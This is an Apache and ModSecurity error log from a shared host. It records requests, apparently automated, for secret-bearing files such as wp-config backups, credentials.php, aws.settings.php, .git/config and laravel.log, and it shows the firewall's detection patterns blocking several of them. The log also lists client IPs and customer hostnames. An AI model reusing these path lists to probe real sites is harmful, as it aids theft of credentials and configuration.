[Mon May 11 23:07:25.611764 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/php-nginx.php
[Mon May 11 23:07:25.794946 2026] [:error] [pid 1601130:tid 1601156] [client 172.212.217.10:38485] File does not exist: /home/ofcrysta/public_html/wp-config.test.php
[Mon May 11 23:07:30.128168 2026] [security2:error] [pid 1606352:tid 1606428] [client 49.51.72.236:34480] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/nature/cabane-a-oiseaux-revival/"] [unique_id "agJFEno_DFxNSZVmaX3drAAAAMk"]
[Mon May 11 23:07:31.294151 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/op.php
[Mon May 11 23:07:31.406983 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/mandrill.php
[Mon May 11 23:07:31.526544 2026] [security2:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/backup.wp-config.php"] [unique_id "agJFE3o_DFxNSZVmaX3dsAAAANY"]
[Mon May 11 23:07:31.526685 2026] [security2:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/backup.wp-config.php"] [unique_id "agJFE3o_DFxNSZVmaX3dsAAAANY"]
[Mon May 11 23:07:31.526908 2026] [security2:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/backup.wp-config.php"] [unique_id "agJFE3o_DFxNSZVmaX3dsAAAANY"]
[Mon May 11 23:07:31.638964 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/20.php
[Mon May 11 23:07:31.777223 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/upload_file.php
[Mon May 11 23:07:31.889592 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/aws.settings.php
[Mon May 11 23:07:32.005880 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/payout.php
[Mon May 11 23:07:32.141779 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/pqr.php
[Mon May 11 23:07:34.707378 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/tmp.php
[Mon May 11 23:07:34.827500 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/456.php
[Mon May 11 23:07:34.939686 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/new2.php
[Mon May 11 23:07:35.052045 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/server.php
[Mon May 11 23:07:35.181742 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/extension-info.php
[Mon May 11 23:07:35.304004 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/conn_test.php
[Mon May 11 23:07:35.431019 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/information.php
[Mon May 11 23:07:35.557499 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/credentials.php
[Mon May 11 23:07:35.687261 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/phphph.php
[Mon May 11 23:07:36.214825 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/test-cgi.php
[Mon May 11 23:07:36.329053 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/twin.php
[Mon May 11 23:07:36.452638 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/pi.php7
[Mon May 11 23:07:36.587199 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/display_phpinfo.php
[Mon May 11 23:07:36.711774 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/webserver-info.php
[Mon May 11 23:07:36.834105 2026] [security2:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/new-wp-config.php"] [unique_id "agJFGHo_DFxNSZVmaX3dyAAAANY"]
[Mon May 11 23:07:36.834280 2026] [security2:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/new-wp-config.php"] [unique_id "agJFGHo_DFxNSZVmaX3dyAAAANY"]
[Mon May 11 23:07:36.834499 2026] [security2:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/new-wp-config.php"] [unique_id "agJFGHo_DFxNSZVmaX3dyAAAANY"]
[Mon May 11 23:07:36.946534 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/env-info.php
[Mon May 11 23:07:37.094615 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/moderator.php
[Mon May 11 23:07:37.860807 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/23.php
[Mon May 11 23:07:38.070692 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/summary.php
[Mon May 11 23:07:38.184495 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/globals.php
[Mon May 11 23:07:38.758408 2026] [:error] [pid 1606352:tid 1606441] [client 172.212.217.10:38015] File does not exist: /home/ofcrysta/public_html/evil.php
[Mon May 11 23:08:14.354456 2026] [authz_core:error] [pid 1588898:tid 1588905] [client 47.128.28.205:25476] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/rest-api/fields/error_log
[Mon May 11 23:08:14.615418 2026] [ssl:error] [pid 1605480:tid 1605544] (EAI 2)Name or service not known: [client 74.7.230.52:57786] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:08:14.615479 2026] [ssl:error] [pid 1605480:tid 1605544] AH01941: stapling_renew_response: responder error
[Mon May 11 23:08:39.486916 2026] [ssl:error] [pid 1588898:tid 1588913] (EAI 2)Name or service not known: [client 114.119.128.132:20461] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:08:39.487045 2026] [ssl:error] [pid 1588898:tid 1588913] AH01941: stapling_renew_response: responder error
[Mon May 11 23:08:41.384117 2026] [ssl:error] [pid 1606352:tid 1606427] (EAI 2)Name or service not known: [client 114.119.128.132:20463] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:08:41.384170 2026] [ssl:error] [pid 1606352:tid 1606427] AH01941: stapling_renew_response: responder error
[Mon May 11 23:08:56.871830 2026] [proxy_fcgi:error] [pid 1588898:tid 1588921] [client 66.154.119.233:48600] AH01071: Got error 'Primary script unknown'
[Mon May 11 23:08:57.863101 2026] [proxy_fcgi:error] [pid 1606352:tid 1606442] [client 13.235.102.232:51622] AH01071: Got error 'Primary script unknown'
[Mon May 11 23:09:28.595826 2026] [security2:error] [pid 1606352:tid 1606432] [client 170.106.37.134:58574] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.portail.tct-telecom.fr"] [uri "/core/js/lib_head.js.php"] [unique_id "agJFiHo_DFxNSZVmaX3eQwAAAM0"]
[Mon May 11 23:09:35.576783 2026] [security2:error] [pid 1605480:tid 1605533] [client 43.128.67.187:42568] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJFjx2Cvzd_nyNfUm8M-AAAAQs"]
[Mon May 11 23:09:48.197528 2026] [autoindex:error] [pid 1588898:tid 1588903] [client 185.213.175.72:35164] AH01276: Cannot serve directory /home/totalcloud/public_html/sitebuilder/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:09:48.199832 2026] [core:error] [pid 1588898:tid 1588903] [client 185.213.175.72:35164] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:09:50.772277 2026] [core:error] [pid 1605480:tid 1605538] [client 185.213.175.72:40984] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:09:50.772305 2026] [core:error] [pid 1605480:tid 1605538] [client 185.213.175.72:40984] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:09:53.035780 2026] [core:error] [pid 1601130:tid 1601162] [client 185.213.175.72:40996] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:09:53.035810 2026] [core:error] [pid 1601130:tid 1601162] [client 185.213.175.72:40996] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:09:57.780413 2026] [core:error] [pid 1605480:tid 1605534] [client 185.213.175.72:41002] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:09:57.780445 2026] [core:error] [pid 1605480:tid 1605534] [client 185.213.175.72:41002] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:02.228674 2026] [core:error] [pid 1601130:tid 1601168] [client 185.213.175.72:51406] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:02.228776 2026] [core:error] [pid 1601130:tid 1601168] [client 185.213.175.72:51406] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:06.203857 2026] [core:error] [pid 1606352:tid 1606431] [client 185.213.175.72:51420] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:06.203903 2026] [core:error] [pid 1606352:tid 1606431] [client 185.213.175.72:51420] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:11.765342 2026] [core:error] [pid 1606352:tid 1606421] [client 185.213.175.72:53412] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:11.765369 2026] [core:error] [pid 1606352:tid 1606421] [client 185.213.175.72:53412] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:16.690038 2026] [core:error] [pid 1588898:tid 1588916] [client 185.213.175.72:53416] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:16.690070 2026] [core:error] [pid 1588898:tid 1588916] [client 185.213.175.72:53416] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:21.975075 2026] [core:error] [pid 1601130:tid 1601170] [client 185.213.175.72:55398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:21.975216 2026] [core:error] [pid 1601130:tid 1601170] [client 185.213.175.72:55398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:24.684461 2026] [core:error] [pid 1606352:tid 1606425] [client 185.213.175.72:55408] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:24.684493 2026] [core:error] [pid 1606352:tid 1606425] [client 185.213.175.72:55408] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:30.703903 2026] [core:error] [pid 1601130:tid 1601159] [client 185.213.175.72:33246] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:30.703939 2026] [core:error] [pid 1601130:tid 1601159] [client 185.213.175.72:33246] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:34.552237 2026] [core:error] [pid 1605480:tid 1605522] [client 185.213.175.72:33256] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:34.552277 2026] [core:error] [pid 1605480:tid 1605522] [client 185.213.175.72:33256] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:40.344982 2026] [core:error] [pid 1590352:tid 1590397] [client 185.213.175.72:33260] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:40.345100 2026] [core:error] [pid 1590352:tid 1590397] [client 185.213.175.72:33260] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:46.867564 2026] [core:error] [pid 1590352:tid 1590401] [client 185.213.175.72:49842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:46.867594 2026] [core:error] [pid 1590352:tid 1590401] [client 185.213.175.72:49842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:50.411703 2026] [core:error] [pid 1588898:tid 1588902] [client 185.213.175.72:53802] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:50.411743 2026] [core:error] [pid 1588898:tid 1588902] [client 185.213.175.72:53802] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:52.677143 2026] [security2:error] [pid 1606352:tid 1606426] [client 43.135.145.73:44052] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJF3Ho_DFxNSZVmaX3engAAAMc"]
[Mon May 11 23:10:54.429667 2026] [core:error] [pid 1588898:tid 1588912] [client 185.213.175.72:53804] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:54.429705 2026] [core:error] [pid 1588898:tid 1588912] [client 185.213.175.72:53804] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:57.201906 2026] [core:error] [pid 1606352:tid 1606422] [client 185.213.175.72:53814] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:10:57.202020 2026] [core:error] [pid 1606352:tid 1606422] [client 185.213.175.72:53814] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:01.069438 2026] [core:error] [pid 1605480:tid 1605528] [client 185.213.175.72:43380] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:01.069472 2026] [core:error] [pid 1605480:tid 1605528] [client 185.213.175.72:43380] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:04.514690 2026] [core:error] [pid 1606352:tid 1606433] [client 185.213.175.72:43388] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:04.514724 2026] [core:error] [pid 1606352:tid 1606433] [client 185.213.175.72:43388] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:07.787171 2026] [core:error] [pid 1601130:tid 1601169] [client 185.213.175.72:43398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:07.787220 2026] [core:error] [pid 1601130:tid 1601169] [client 185.213.175.72:43398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.804876 2026] [security2:error] [pid 1605480:tid 1605532] [client 185.213.175.72:34590] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.git/config"] [unique_id "agJF7x2Cvzd_nyNfUm8NZwAAAQo"]
[Mon May 11 23:11:11.805117 2026] [security2:error] [pid 1605480:tid 1605532] [client 185.213.175.72:34590] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sitebuilder.totalcloud.fr"] [uri "/.git/config"] [unique_id "agJF7x2Cvzd_nyNfUm8NZwAAAQo"]
[Mon May 11 23:11:11.805514 2026] [core:error] [pid 1601130:tid 1601165] [client 185.213.175.72:34806] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.805539 2026] [core:error] [pid 1601130:tid 1601165] [client 185.213.175.72:34806] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.805636 2026] [core:error] [pid 1606352:tid 1606427] [client 185.213.175.72:34884] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.805655 2026] [core:error] [pid 1606352:tid 1606427] [client 185.213.175.72:34884] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.805709 2026] [core:error] [pid 1605480:tid 1605532] [client 185.213.175.72:34590] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 23:11:11.806333 2026] [security2:error] [pid 1601130:tid 1601171] [client 185.213.175.72:34614] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "sitebuilder.totalcloud.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agJF73EgAO_835W6c1mkXQAAAFU"]
